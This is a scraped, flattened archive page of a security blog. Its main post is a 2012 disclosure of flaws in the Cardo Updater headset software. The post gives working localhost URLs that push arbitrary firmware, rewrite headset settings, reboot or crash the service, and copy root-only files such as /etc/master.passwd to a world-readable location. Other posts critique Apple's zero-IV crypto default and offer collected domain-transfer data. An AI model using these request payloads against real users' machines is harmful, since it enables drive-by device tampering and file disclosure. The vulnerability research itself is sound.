Meta tags:
Headings (most frequently used words):
2012, cet, tue, 01, 15, 00, mon, jan, the, jun, 11, 17, 25, cest, 2014, feb, 21, 19, 35, 56, 09, 38, 27, 16, 33, ride, with, devil, content, transfer, done, collected, 1st, 2nd, level, domains, new, hosting, simpler, layout, apple, idioten, vektor, iv, responsibility, at, least, they, fail, consistently, wait, there, is, more,
Text of the page (most frequently used words):
the (150), and (82), that (29), this (27), cardo (21), for (19), with (18), you (16), will (15), using (14), your (14), http (14), what (13), their (13), api (13), crypto (12), there (12), application (12), firmware (12), tmp (12), apple (11), all (11), software (11), 8080 (11), have (10), url (10), they (9), like (9), mode (9), etc (9), can (9), could (9), level (9), not (9), updater (9), 127 (9), csr (9), root (9), osx (8), ios (8), security (8), following (8), when (8), one (8), about (8), new (8), website (8), content (8), after (8), device (8), var (8), file (7), link (7), are (7), data (7), well (7), used (7), block (7), cbc (7), key (7), interface (7), cardosystems (7), port (7), running (7), pskey (7), also (6), did (6), code (6), vector (6), parameter (6), but (6), service (6), available (6), get (6), headset (6), request (6), was (6), com (6), posted (5), permanent (5), remote (5), exploit (5), org (5), wrong (5), use (5), sample (5), void (5), 0x0 (5), initialization (5), cipher (5), provided (5), some (5), common (5), should (5), main (5), 2012 (5), from (5), system (5), everyone (5), installed (5), gdb (5), number (5), commands (5), cardojs (5), out (4), found (4), access (4), encryption (4), done (4), projects (4), open (4), even (4), cccryptorcreate (4), const (4), ciphers (4), must (4), selected (4), files (4), any (4), make (4), how (4), cryptographic (4), thing (4), interfaces (4), through (4), most (4), world (4), know (4), layout (4), domain (4), domains (4), download (4), keykeriki (4), check (4), see (4), discovered (4), configuration (4), value (4), callback (4), universalcallback (4), _id (4), 22requesttype (4), updatefirmware (4), update (4), required (4), around (4), master (4), passwd (4), kb5llv (4), user (4), write_nocancel (4), 0x1 (4), completely (4), www (4), settings (4), xxx (4), tcp (4), books (3), simply (3), rank (3), guess (3), more (3), now (3), experts (3), might (3), initialize (3), optional (3), chaining (3), present (3), same (3), length (3), algorithm (3), bit (3), null (3), ecb (3), case (3), apis (3), man (3), text (3), page (3), cryptoexercise (3), set (3), still (3), fact (3), anything (3), has (3), been (3), else (3), able (3), old (3), cet (3), further (3), 1st (3), 2nd (3), information (3), transfers (3), our (3), transfer (3), computer (3), unauthenticated (3), listening (3), attached (3), upgrade (3), test (3), binary (3), dial (3), chip (3), dsp (3), only (3), readable (3), dtruss (3), later (3), type (3), bluetooth (3), modzero (3), community (3), configure (3), just (3), features (3), ride (3), 2014 (3), under (2), google (2), two (2), those (2), made (2), cocoa (2), right (2), book (2), amazon (2), best (2), sellers (2), core (2), iphone (2), note (2), wait (2), super (2), documentation (2), official (2), nobody (2), told (2), them (2), broken (2), increase (2), decent (2), source (2), least (2), fail (2), size_t (2), reference (2), options (2), flags (2), zeroes (2), call (2), instead (2), zeros (2), without (2), unique (2), unpredictable (2), another (2), known (2), operation (2), given (2), pretty (2), single (2), fortunately (2), developer (2), really (2), since (2), possibly (2), read (2), very (2), first (2), cccryptor (2), such (2), symmetric (2), different (2), cccrypt (2), cccryptorfinal (2), cccryptorupdate (2), comes (2), secure (2), random (2), generation (2), handled (2), framework (2), together (2), between (2), responsibility (2), look (2), provides (2), stuff (2), here (2), let (2), library (2), expert (2), idioten (2), vektor (2), mon (2), jan (2), patient (2), drop (2), mail (2), location (2), hosting (2), simpler (2), feel (2), free (2), send (2), names (2), lot (2), late (2), 2009 (2), second (2), subdomain (2), txt (2), tgz (2), having (2), much (2), decided (2), every (2), collected (2), links (2), archive (2), misc (2), research (2), printfs (2), 4ghz (2), wireless (2), keyboard (2), sniffer (2), 27mhz (2), suisseid (2), npa (2), weaknesses (2), tue (2), g9x (2), headsets (2), informed (2), systems (2), binding (2), output (2), wants (2), pointer (2), thus (2), memory (2), reason (2), issue (2), added (2), 0x95c26710 (2), strlen (2), mediator (2), strange (2), alter (2), bccmd (2), linux (2), crappy (2), 674 (2), initiate (2), thats (2), requestid (2), tested (2), does (2), support (2), playing (2), would (2), kb5 (2), other (2), directory (2), bin (2), into (2), open_nocancel (2), attacking (2), 22updatefirmware (2), 22csr (2), requests (2), local (2), identify (2), basically (2), windows (2), existing (2), automatically (2), built (2), corresponding (2), tools (2), yes (2), fast (2), executed (2), sent (2), community1 (2), beloved (2), communication (2), grep (2), listen (2), alt (2), info (2), cache (2), which (2), quality (2), looking (2), scala (2), rider (2), devil (2), mess, people, who, abusing, dead, trees, spread, word, covering, professional, graham, lee, 527, 874, pro, persistence, engine, ipad, ipod, touch, sic, michael, privat, robert, warner, chapter, advanced, applications, creating, password, storage, 289, 601, fifty, per, cent, imagine, guys, mentioned, above, special, notes, hints, ever, question, ahead, watch, github, forking, hell, simple, mistake, period, time, due, copy, paste, mentality, maybe, recently, featured, closed, appstore, safely, stores, passwords, follow, guidelines, consistently, uint8_t, kchosencipherblocksize, memset, sizeof, create, ccstatus, encryptordecrypt, kccalgorithmaes128, pkcs7, symmetrickey, bytes, kchosencipherkeysize, thisencipher, looks, param, enabled, size, absence, kccoptionecbmode, ignored, stream, cccryptorstatus, ccoperation, kccencrypt, ccalgorithm, alg, kccalgorithmdes, ccoptions, kccoptionpkcs7padding, raw, material, keylength, cccryptorref, cryptorref, returned, header, returning, enobrain, warning, damn, option, along, starting, encrypt, decrypt, especially, usage, describe, easily, learn, ivs, message, encrypted, avoid, several, types, attacks, exactly, initialized, entirely, wikipedia, supports, needs, explicitly, prove, stupidity, default, minor, called, supposedly, translated, acronym, ignorance, writing, pages, sounding, functions, shot, function, perform, algorithms, aes, 3des, hardcore, rc4, des, ccryptorcreatefromdata, cccryptorrelease, cccryptorgetoutputlength, cccryptorreset, provide, 3cc, related, coding, certificate, trust, services, exercise, demonstrates, sets, sdk, asymmetric, nonce, whereas, digest, commoncrypto, brings, both, these, network, discoverable, via, bonjour, performs, dummy, protocol, devices, subnet, regarding, safe, unambiguous, programming, published, documented, online, sounds, promising, brief, understanding, high, take, care, ignores, objective, php, programmers, ain, reflect, functionality, matters, become, hero, company, proven, adding, apps, isn, complicated, years, student, generate, buzzwords, portfolio, keynote, slides, hence, agree, important, therefore, left, kind, probably, extensively, construed, vast, amount, move, hoste, took, chance, slim, down, simplify, miss, certain, until, moved, updates, third, scan, results, warned, contains, gathered, updated, useful, statistics, 3rd, gathering, megabytes, compressed, disk, beeing, too, lately, put, ready, arpa, gov, int, trtz, then, 2011, top, allowed, please, discover, missing, containing, codes, project, injector, analyzer, transfered, feb, max, moser, don, insights, android, didn, investigated, supported, hey, fix, vendor, blogpost, removed, takes, risk, opening, unencrypted, fragile, pice, target, drive, style, reconfiguration, indicates, assumed, conduct, 0x000000, happen, crash, difficult, arguments, expecting, parse, example, aaaaaa, program, received, signal, exc_bad_access, kern_protection_failure, address, 0x00000000, switching, process, 45870, thread, 0x2503, 0x98aa94ca, std, string, operator, 0x0003d4ec, handlenewrequest, 0x0003c954, handlemongoosenewrequest, 0x0003c22b, httpserver, mongooseeventhandler, 0x0000fea3, call_user, 0x000195d0, handle_request, 0x00019dce, process_new_connection, 0x00019fb8, worker_thread, 0x901c75fb, _pthread_body, 0x901c7485, _pthread_start, 0x901cccf2, thread_start, crashed, attaching, learned, seems, whats, next, browsing, disassembler, pstools, wont, explain, concept, bluecore, feature, uses, store, its, values, persistently, 0x02a2, holds, quick, 22executecoldreset, instantly, reboot, getcurrentstatus, status, getresult, result, why, echo, readpskey, writepskey, write, deletepskey, delete, writedspmem, readdspmem, executecoldreset, resets, reboots, urls, wondered, work, vulnerability, strings, list, comments, while, critical, served, purpose, piece, copying, temp, makes, las, wheel, 5633, may, cat, database, consulted, directly, times, opendirectoryd, additional, unprivileged, empty, usr, false, administrator, line, assumptions, showed, downloaded, temporary, validated, procedure, obviously, valid, tempfile, fore, requesttype, 0x4c, handling, 0x2b, synchronized, queued, waiting, completion, 0x4a, dev, lstat64, 0xb0114688, 0x80, err, 0x601, 0x1b6, downloading, 0x2a, 22file, reading, javascript, identified, privilege, escalation, happens, processes, truncated, recapitulate, webserver, libusb, gateway, unprotected, regular, specific, image, build, patch, distribute, users, clicking, referring, ide, bluesuite, acquired, various, locations, being, guy, knowing, bits, bluez, interact, pstool, dfutool, allows, backup, 22http, images, logo, png, yep, worse, thinking, field, identifier, responses, asynchronous, post, sites, accessing, expensive, dialer, changing, way, t4rk79esoy, 22writepskey, 22pskey, 22key_no, 22length, 22value, 223030343935353232323232363600, 22requestid, 22t4rk79esoy, depending, setting, change, constructed, 0049552222266, few, minutes, obvious, something, played, web, works, beautiful, insecure, consists, gazillion, javascripts, building, locally, webservice, modules, externals, scripts, started, burp, proxy, sure, going, soon, runing, recognize, displayed, individual, synch, actual, sudo, lsof, upd, 37333, ipv4, 0x95ffbcff24844da1, 0t0, associations, connections, outif, lo0, src, 57910, dst, aux, connection, succeeded, 500, internal, error, plain, during, installation, monitor, hands, off, https, oneperiodic, products, handsoff, bind, itself, minute, wtf, investigation, recognised, launchagent, clear, according, manual, accessed, version, macbcif, cardo_updater_1, pkg, operationally, functionally, good, fair, price, story, were, sound, compatibility, upgradeability, fixes, researching, motorcycles, mid, class, product, nice, hobbies, motorcycle, wife, travel, abilities, intercom, kit, three, players, market, recognisable, brands, part, jun, cest, index, archives, hardware, categories, recent, entries, totalphase, backtrack, june, hacking, fun,
Text of the page (random words):
ux info available connection to 127 0 0 1 port 8080 tcp http alt succeeded get http 1 1 http 1 1 500 internal error cache no cache content type text plain content length 28 i started a sniffer and the all beloved burp proxy and made sure that i see all the communication going on between this service and anything else as soon the the cardo updater service was runing the community website of cardosystems did recognize my q3 device and displayed a website to configure the individual settings upgrade the firmware and synch the settings to my actual headset after a few minutes it was obvious that cardo did something very strange i played around with the web application and discovered that it works beautiful but completely insecure the configuration website basically consists out of a gazillion of javascripts building requests that are sent to the locally installed and running webservice the main api is available at http community1 cardosystems com application modules headsets externals g9 scripts cardojs interface js depending on what setting you change on the cardo website a corresponding request will be constructed and executed the following url sent to the local running service will set the fast dial number 0049552222266 on my headset http xxx xxx xxx xxx cardo api callback cardojs interface universalcallback _id t4rk79esoy data 22requesttype 22 22writepskey 22 22pskey 22 22key_no 22 674 22length 22 7 22value 22 223030343935353232323232363600 22 22requestid 22 22t4rk79esoy 22 yes i know what your are thinking and yes it s completely unauthenticated and the requestid field is only an identifier used to identify responses in case of asynchronous commands if you post such an url to the cardo community sites guess what everyone accessing the url will automatically alter their configuration of the fast dial number in the attached headset one could configure an expensive service dialer number or just changing other settings no way yep and it was even worse check the following url http 127 0 0 1 8080 cardo api callback cardojs interface universalcallback _id 1r data 22requesttype 22 22updatefirmware 22 22csr 22 22http www modzero ch images modzero logo png 22 this specific request will initiate a firmware update of the device with the firmware image provided as csr parameter everyone able to build a firmware or patch an existing one could distribute it automatically to users clicking the link csr is referring to the built in bluetooth chip the required ide as well as the corresponding tools like the bluesuite can be acquired from csr or discovered in various download locations being an old bluetooth guy and knowing some bits about the csr i know that there are a lot of tools built in into the bluez framework of linux you can interact with the chip using bccmd pstool or dfutool the later one allows you to make a backup of your existing firmware of the device so to recapitulate the cardo updater is basically a webserver to libusb gateway completely unprotected and unauthenticated binding to all interfaces running as root on osx and as a regular user on windows at least after playing around with the requests and reading some of the javascript api i identified a local privilege escalation that make any file on the computer world readable by using dtruss i could further identify what happens when cardo updater processes the firmware update request see the following attacking url and the truncated output of dtruss attacking url http 127 0 0 1 8080 cardo api callback cardojs interface universalcallback _id 1r data 22requesttype 22 22updatefirmware 22 22csr 22 22file etc master passwd 22 write_nocancel 0x1 request requesttype updatefirmware csr file etc master passwd n 0 0x4c 76 0 write_nocancel 0x1 handling request of type updatefirmware n 0 0x2b 43 0 write_nocancel 0x1 synchronized request of type updatefirmware queued waiting completion n 0 0x4a 74 0 open_nocancel dev random 0 0x0 0x0 14 0 lstat64 var tmp tmp 0 kb5llv 0 0xb0114688 0x80 1 err 2 open_nocancel var tmp tmp 0 kb5llv 0 0x601 0x1b6 12 0 write_nocancel 0x1 downloading new csr firmware from website n 0 0x2a 42 0 open etc master passwd 0 0x0 0x0 14 0 in line with my assumptions dtruss showed that the firmware file provided as a parameter to the url will be downloaded into a temporary file and later validated in this case var tmp tmp 0 kb5llv later in the procedure the update will fail as this is obviously no valid csr firmware but the tempfile is still there and readable fore everyone ls las var tmp tmp 0 kb5 16 rw r r 1 root wheel 5633 may 27 11 08 var tmp tmp 0 kb5llv cat var tmp tmp 0 kb5 user database note that this file is consulted directly only when the system is running in single user mode at other times this information is provided by open directory see the opendirectoryd 8 man page for additional information about open directory nobody 2 2 0 0 unprivileged user var empty usr bin false root 0 0 0 0 system administrator var root bin sh while master passwd is not a critical file it served the purpose well this piece of crappy software is copying root only files to the temp location and makes it world readable after playing around a bit with the api and urls i wondered what else would work and what vulnerability would be present using strings the following list of commands have been discovered i added some comments to it updatefirmware initiate a firmware update on csr chip or the dsp getcurrentstatus get the status of the device getresult get a result of a given operation thats why requestid is required echo guess what readpskey read a pskey value writepskey write a pskey value deletepskey delete a pskey value writedspmem could not be tested as my device does not support dsp commands readdspmem could not be tested as my device does not support dsp commands executecoldreset resets and reboots the device so e g http 127 0 0 1 8080 cardo api callback cardojs interface universalcallback _id 1r data 22requesttype 22 22executecoldreset 22 will instantly reboot the attached headset using the pskey commands you can alter the configuration of the device in fact this can be done using pstools or bccmd under linux as well instead of using this crappy software i wont explain the concept of pskey s here google for csr bluecore and pskey if you like to know more about it this is a common feature and cardo uses this to store its configuration values persistently e g the pskey with the value 674 0x02a2 holds the quick dial number so whats next well by browsing through the cardo updater binary using a disassembler i discovered a strange url http 127 0 0 1 8080 test the cardo updater crashed so after attaching gdb i learned that it seems to have a null pointer issue program received signal exc_bad_access could not access memory reason kern_protection_failure at address 0x00000000 switching to process 45870 thread 0x2503 0x95c26710 in strlen gdb gdb bt 0 0x95c26710 in strlen 1 0x98aa94ca in std string operator 2 0x0003d4ec in mediator handlenewrequest 3 0x0003c954 in mediator handlemongoosenewrequest 4 0x0003c22b in httpserver mongooseeventhandler 5 0x0000fea3 in call_user 6 0x000195d0 in handle_request 7 0x00019dce in process_new_connection 8 0x00019fb8 in worker_thread 9 0x901c75fb in _pthread_body 10 0x901c7485 in _pthread_start 11 0x901cccf2 in thread_start gdb in fact the reason for that issue is that the software is expecting to parse a parameter added to the test url see the following example url http 127 0 0 1 8080 test aaaaaa so as the output of gdb indicates it is assumed that the cardo updater wants to conduct a length check on the parameter if there is no parameter the pointer will be null and thus the memory access to 0x000000 will happen and the application will crash cardo what is wrong to difficult to check the number of arguments this software takes your computer system at risk by opening a unauthenticated unencrypted listening port on all interfaces and binding a fragile pice of software to it everyone with this software running and the headset attached can be a target of a drive by style firmware upgrade or reconfiguration of their headset the vendor has been informed about this blogpost and the software is removed from my systems everyone with the cardo updater installed should do the same hey cardosystems fix your stuff p s i don t have any insights on they g9x headsets and their software there is an android and an ios application available but i didn t investigated anything there as my q3 is not supported feel free to send me a g9x and i might check it out posted by max moser permanent link tue feb 21 19 35 56 cet 2012 content transfer done we did transfer the content from our old system to the new layout please drop us an e mail if you discover missing content or broken links we transfered the following content suisseid and npa weaknesses keykeriki v1 0 27mhz wireless keyboard analyzer keykeriki v2 0 2 4ghz wireless keyboard sniffer injector printfs project page our archive containing misc projects research and codes posted by remote exploit org permanent link 2012 01 09 15 15 00 collected 1st 2nd level domains every now and then i go through the domain names like most of us in late 2009 2011 the following top level domains allowed domain transfers ac ag al an ao arpa aw ba bd bi bj bm bn bs bv ci cu cv de er gd ge gn gov gq gt gy in int io jm jo ke kg kh ki kz lb lc lk lr ma md mg mh mp mr mt mw ne nf ng ni np pe pf pg pw py sh sj sk sl sn so sr sv sz tc tj tm tn trtz ug uk uy vg vi ye yu zw after having the files on my disk without beeing used too much lately i decided to put second level subdomain transfers txt tgz up on our website ready for download you should be warned second level subdomain transfers txt tgz is about 55 megabytes of compressed text and contains all the gathered 1st and 2nd level domain names a lot of the domains are not updated since late 2009 but the information is still useful for statistics or 3rd level gathering etc feel free to send me updates and or third level domain scan results etc posted by remote exploit org permanent link mon jan 9 01 38 27 cet 2012 new hosting simpler layout as we move from one hoste to another we also took the chance to further slim down the website and simplify the layout if you miss a certain content you might have to be patient drop us an e mail or be patient until we moved it to the new location posted by remote exploit org permanent link mon jan 9 00 16 33 cet 2012 the apple idioten vektor iv we all agree that crypto is important and therefore should be left to the experts well kind of this expert thing is probably the most extensively construed thing in the world of it security we all know that we have a vast amount of experts out there apple still ignores the fact that objective c and cocoa is the new php most ios programmers ain t reflect anything that has been told to them functionality matters what else you ll become a super hero in your company if you have proven to be able adding security to your apps fortunately apple provides a crypto library that isn t that complicated so even your 17 years old ios expert student is able to generate new buzzwords for your portfolio keynote slides hence more so let s call this thing that apple must take care of responsibility responsibility regarding how secure and safe their software is how unambiguous their application programming interfaces should look like and how it is published and documented apple provides documentation to their apis in their online ios and osx developer library they also have some crypto stuff available here let s have a look at the cryptoexercise sounds promising to get a brief understanding about their high level crypto api this sample demonstrates the use of the two main cryptographic api sets on the iphone os sdk asymmetric key encryption and random nonce generation is handled through the security framework api set whereas symmetric key encryption and digest generation is handled by the commoncrypto api set the cryptoexercise sample brings both of these apis together through a network service discoverable via bonjour that performs a dummy cryptographic protocol between devices found on the same subnet link apple crypto exercise the cryptoexercise is the official related sample code when it comes to secure coding and e g to the certificate key and trust services reference they also provide a man page for their common crypto interface cccryptor 3cc cccryptorcreate ccryptorcreatefromdata cccryptorrelease cccryptorupdate cccryptorfinal cccryptorgetoutputlength cccryptorreset cccrypt common cryptographic algorithm interfaces using the cccryptor one can use common sounding functions such as cccryptorcreate cccryptorupdate cccryptorfinal or simply cccrypt one shot function to perform symmetric encryption using different algorithms like aes 3des and hardcore security ciphers like rc4 des etc apple supports ecb and cbc mode for their ciphers and fortunately a developer really needs to explicitly prove stupidity by using ecb since apis default to cbc the cipher block chaining mode what could possibly go wrong right there is some minor thing that is called the iv apple supposedly translated the acronym iv to ignorance vector when writing their common crypto api man pages but we should read initialization vector used to initialize the very first block of cipher text you can easily learn even on wikipedia that ivs must be unique for any message encrypted with a given key and also that an iv must be unpredictable to avoid several types of cryptographic attacks that s pretty well known and there is exactly no single use case for an iv initialized entirely with zeros and this is how they describe their api and especially the usage of the iv another option for block ciphers is cipher block chaining known as cbc mode when using cbc mode an initialization vector iv is provided along with the key when starting an encrypt or decrypt operation if cbc mode is selected and no iv is provided an iv of all zeroes will be used instead of simply returning enobrain they initialize the iv with zeros without any warning this is so damn unique and unpredictable you can t make this up in their header files they call the initialization vector optional param iv initialization vector optional used by block ciphers when cipher block chaining cbc mode is enabled if present must be the same length as the selected algorithm s block size if cbc mode is selected by the absence of the kccoptionecbmode bit in the options flags and no iv is present a null all zeroes iv will be used this parameter is ignored if ecb mode is used or if a stream cipher algorithm is selected cccryptorstatus cccryptorcreate ccoperation op kccencrypt etc ccalgorithm alg kccalgorithmdes etc ccoptions options kccoptionpkcs7padding etc const void key raw key material size_t keylength const void iv optional initialization vector cccryptorref cryptorref returned and the sample code looks like that uin...
|